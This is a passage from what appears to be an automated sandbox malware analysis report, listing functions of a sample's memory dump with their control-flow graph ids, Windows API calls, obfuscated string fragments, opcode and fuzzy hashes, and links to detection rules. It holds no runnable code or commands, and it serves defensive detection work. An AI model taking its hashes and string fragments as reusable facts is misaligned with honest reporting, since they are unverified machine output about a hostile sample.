                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: fd94c542bf047b648ddb35bc97e687dbaf5303dea9af270df80644af7dec2c76
                                                                                                                          • Instruction ID: d3d43330dec133298da1060eb8e55c20294748084027a53f7c621b8493409006
                                                                                                                          • Opcode Fuzzy Hash: fd94c542bf047b648ddb35bc97e687dbaf5303dea9af270df80644af7dec2c76
                                                                                                                          • Instruction Fuzzy Hash: 58213AB491021A9FEB15CF94CC90BBEBBB1FF4A304F144859E811BB392C775A951CB64
                                                                                                                          Function 00CE6858 Relevance: 4.6, APIs: 3, Instructions: 106registryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 148 ce6858-ce7ddb 151 ce7ddd-ce7df8 RegOpenKeyA 148->151 152 ce7e04-ce7e1f RegOpenKeyA 148->152 151->152 153 ce7dfa 151->153 154 ce7e37-ce7e63 152->154 155 ce7e21-ce7e2b 152->155 153->152 158 ce7e65-ce7e6e GetNativeSystemInfo 154->158 159 ce7e70-ce7e7a 154->159 155->154 158->159 160 ce7e7c 159->160 161 ce7e86-ce7e94 159->161 160->161 163 ce7e96 161->163 164 ce7ea0-ce7ea7 161->164 163->164 165 ce7ead-ce7eb4 164->165 166 ce7eba 164->166 165->166 167 ce4179-ce4180 165->167 168 ce8a38-ce8a63 166->168 169 ce680a-ce6c6b 167->169 170 ce4186-ce419e 167->170 169->168 170->169
                                                                                                                          APIs
                                                                                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 00CE7DF0
                                                                                                                          • RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 00CE7E17
                                                                                                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 00CE7E6E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Open$InfoNativeSystem
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1247124224-0
                                                                                                                          • Opcode ID: e163b14ad6be46a786cf7fcbe336dcca4c68586b98a45e4fa071f410fe43f6ab
                                                                                                                          • Instruction ID: 039abc4cac5027ef51207d20c31f1aa0309659af9a0fbbb2c37d6ee1ee022d9d
                                                                                                                          • Opcode Fuzzy Hash: e163b14ad6be46a786cf7fcbe336dcca4c68586b98a45e4fa071f410fe43f6ab
                                                                                                                          • Instruction Fuzzy Hash: 2041A2B110828EDFEB21EF12C808BEF7BA8EF01314F540529E99182D51E7764DA4CF99
                                                                                                                          Function 00B43220 Relevance: 1.6, APIs: 1, Instructions: 59memoryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 227 b43220-b4322f 228 b43236-b43252 227->228 229 b432a0 227->229 230 b432a2-b432a6 RtlFreeHeap 227->230 231 b432ac-b432b0 227->231 232 b43254 228->232 233 b43286-b43296 228->233 229->230 230->231 234 b43260-b43284 call b45af0 232->234 233->229 234->233
                                                                                                                          APIs
                                                                                                                          • RtlFreeHeap.NTDLL(?,00000000), ref: 00B432A6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3298025750-0
                                                                                                                          • Opcode ID: 296b32440206e6d7bc88c1c33290049cba92752cab75d2e85eacf44ac884ac42
                                                                                                                          • Instruction ID: 1eb0b6b35a0882c49a87c50dfd4939cc7af5651be7b46d496dca763760064067
                                                                                                                          • Opcode Fuzzy Hash: 296b32440206e6d7bc88c1c33290049cba92752cab75d2e85eacf44ac884ac42
                                                                                                                          • Instruction Fuzzy Hash: 64016D3450D3409BC711EF18E845A1ABBE8EF4AB01F054D5CE5C58B361D735DD60DB96
                                                                                                                          Function 00B43202 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                          Download Yara Rule

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 238 b43202-b43211 RtlAllocateHeap
                                                                                                                          APIs
                                                                                                                          • RtlAllocateHeap.NTDLL(?,00000000), ref: 00B43208
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocateHeap
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1279760036-0
                                                                                                                          • Opcode ID: e87c4e252d8ee0ddd2e5bf74cbcaf6a71b3b4d8103229d42f4a03fdfb04e137d
                                                                                                                          • Instruction ID: ec7ad1eb0785346b6cff0ac44b90e5ff34d3f8dfa6b1822ed00d5a778bf0b309
                                                                                                                          • Opcode Fuzzy Hash: e87c4e252d8ee0ddd2e5bf74cbcaf6a71b3b4d8103229d42f4a03fdfb04e137d
                                                                                                                          • Instruction Fuzzy Hash: B2B012301401005FDA141B00EC0AF003510EB00606F800190A100050B1D5615C64C555

                                                                                                                          Non-executed Functions

                                                                                                                          Function 00B323E0 Relevance: 33.0, APIs: 4, Strings: 13, Instructions: 3298COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+($3<$:$Cx$`tii$aenQ$f@~!$fedc$ggxz$mlc@${l`~$|}&C$#v
                                                                                                                          • API String ID: 0-2260822535
                                                                                                                          • Opcode ID: f0d1469a7614d0ce3aa748df55bd3050e7a608448b171859d8ee4bdfa3e1f5aa
                                                                                                                          • Instruction ID: cbe94a3fa27678c4e0d14f8545fb7053e3ee14164f1e6ec9ad48322afa216b26
                                                                                                                          • Opcode Fuzzy Hash: f0d1469a7614d0ce3aa748df55bd3050e7a608448b171859d8ee4bdfa3e1f5aa
                                                                                                                          • Instruction Fuzzy Hash: 73339A74504B818BD7258F38C590B63BBE1FF16304F68899DE4DA8BA92C735F906CB61
                                                                                                                          Function 00B1DB6F Relevance: 32.0, Strings: 24, Instructions: 2006COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: InitializeThunk
                                                                                                                          • String ID: %*+($()./$89&'$89>?$:WUE$<=2$<=:;$@ONM$AR$D$DCBA$LKJI$QNOL$T$WP$`Y^_$`onm$dcba$lkji$mjkh$tsrq$tuJK$xgfe$|
                                                                                                                          • API String ID: 2994545307-1418943773
                                                                                                                          • Opcode ID: 0a661d8e28c08f2cad2eb2f32e4529bc92cdb22fa5aa5eb50442a1f5219889d4
                                                                                                                          • Instruction ID: 5fc6cf87f8e94509a3bbebc9a6f6fca2da848bbf456ec0e8d8cc36f4ee98fe26
                                                                                                                          • Opcode Fuzzy Hash: 0a661d8e28c08f2cad2eb2f32e4529bc92cdb22fa5aa5eb50442a1f5219889d4
                                                                                                                          • Instruction Fuzzy Hash: 80F278B05083829BD770CF14D484BEBBBE2EFD5304F9448ACE8D98B251DB319985CB92
                                                                                                                          Function 00B29F62 Relevance: 21.7, Strings: 17, Instructions: 473COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %e6g$(a*c$=]$?m,o$CG$Gt$JG$N[$WH$]{$hi$kW$/)$S]$WQ$_Y$sm
                                                                                                                          • API String ID: 0-1131134755
                                                                                                                          • Opcode ID: 6b41b4a1dfa1c3b032b16bb2ff1f636482e7d498701bfb740ac954b99384bbc3
                                                                                                                          • Instruction ID: aa6c4e22444859bcce26db075aaa3cad15f6bef02b045afb366dc13a2a08d567
                                                                                                                          • Opcode Fuzzy Hash: 6b41b4a1dfa1c3b032b16bb2ff1f636482e7d498701bfb740ac954b99384bbc3
                                                                                                                          • Instruction Fuzzy Hash: 2052B6B454D385CAE270CF25E581B8EBAF1BB92740F608A1DE1ED9B255DBB08045CF93
                                                                                                                          Function 00B29510 Relevance: 20.4, Strings: 16, Instructions: 427COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: !E4G$,A&C$2A"_$8;$;IJK$?M0K$B7U1$B?Q9$G'M!$G+X5$L3Y=$O+f)$T#a-$X/R)$pq$z=Q?
                                                                                                                          • API String ID: 0-655414846
                                                                                                                          • Opcode ID: b5b6123eb94b5c0b0476d46166011b984c3f4f1a08abcdf63a6888fcbd621ca8
                                                                                                                          • Instruction ID: 1f0995cd0fed439b273aa4dc61cd9e556889dc56976362a9edf5ba834166f91d
                                                                                                                          • Opcode Fuzzy Hash: b5b6123eb94b5c0b0476d46166011b984c3f4f1a08abcdf63a6888fcbd621ca8
                                                                                                                          • Instruction Fuzzy Hash: 67F130B0518380ABD310DF15E881A2BBBF4FB9AB84F144D9CF4D99B252D374D908CB96
                                                                                                                          Function 00B2DD29 Relevance: 14.9, Strings: 11, Instructions: 1142COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+($)IgK$,Q?S$-M2O$<Y.[$=]+_$Y9N;$hX]N$n\+H$upH}${E
                                                                                                                          • API String ID: 0-1557708024
                                                                                                                          • Opcode ID: 0b662131d70802c40b2bdf6e06f9735d161bb3a11b3d22e461e4e261d2f225b6
                                                                                                                          • Instruction ID: fc9c429a3043eac4a4ea3ed6a482673e8b694850e547421e56c147085245e3d9
                                                                                                                          • Opcode Fuzzy Hash: 0b662131d70802c40b2bdf6e06f9735d161bb3a11b3d22e461e4e261d2f225b6
                                                                                                                          • Instruction Fuzzy Hash: D592CD71E002158FDB14CF69D8917AEBBF2FF49311F2986A8E456AB391D731AD01CB90
                                                                                                                          Function 00B2098B Relevance: 10.8, Strings: 8, Instructions: 836COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*+($&> &$,#15$9.5^$cah`$gce/$qrqp${
                                                                                                                          • API String ID: 0-4102007303
                                                                                                                          • Opcode ID: 20a22a14ffebb03e915057db2f5620b60baf614f05cd8c9d77d33c379a025a4b
                                                                                                                          • Instruction ID: e0138942c2fe6cc85f47cf0f70af8a654b5524530f0e0c893bbeae9e0fc57411
                                                                                                                          • Opcode Fuzzy Hash: 20a22a14ffebb03e915057db2f5620b60baf614f05cd8c9d77d33c379a025a4b
                                                                                                                          • Instruction Fuzzy Hash: E162A9B16183818BD330DF14E491BABBBE1FF96314F044DADE49A8B682E7758940CB53
                                                                                                                          Function 00B01000 Relevance: 10.5, Strings: 7, Instructions: 1785COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$@$gfff$gfff$gfff
                                                                                                                          • API String ID: 0-2517803157
                                                                                                                          • Opcode ID: 9c0d3ffbe7654616787b6dd0bdb0f278a426abe55fdca1428cff0c7c2adebea9
                                                                                                                          • Instruction ID: 8a6b581e90a6bf6b313abed4ede93ccc39fbaedec85fcc945ed407810d509a98
                                                                                                                          • Opcode Fuzzy Hash: 9c0d3ffbe7654616787b6dd0bdb0f278a426abe55fdca1428cff0c7c2adebea9
                                                                                                                          • Instruction Fuzzy Hash: 88D2C2716083418FD718CF28C89836ABFE2EBD9314F188AADE595873D1D774D949CB82
                                                                                                                          Function 00CD2FD5 Relevance: 10.4, Strings: 7, Instructions: 1675COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: )sw$Aj|$N&n:$S5{_$_/>D$_wt{$|'vW
                                                                                                                          • API String ID: 0-1093776186
                                                                                                                          • Opcode ID: f5d361160a6636cd9a4040e8e62f99f7fca385fb870acb33e89c4e08be140033
                                                                                                                          • Instruction ID: ebdf3b9ed3086029ccb67aff098432400d94d7d0d3b3b1070f06b3bc357334e0
                                                                                                                          • Opcode Fuzzy Hash: f5d361160a6636cd9a4040e8e62f99f7fca385fb870acb33e89c4e08be140033
                                                                                                                          • Instruction Fuzzy Hash: A3B23AF3A0C204AFE3046E2DEC8577ABBD9EB94320F1A493DE6C4C3744E97598058696
                                                                                                                          Function 00CC8E91 Relevance: 9.2, Strings: 6, Instructions: 1684COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.2445877592.0000000000B60000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.2445771783.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445782982.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000CE0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DC4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000DF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2445877592.0000000000E05000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446155255.0000000000E06000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.2446244221.0000000000FA0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: U{;$XJo{$Y_/=$m^|+$vah=$wZ>
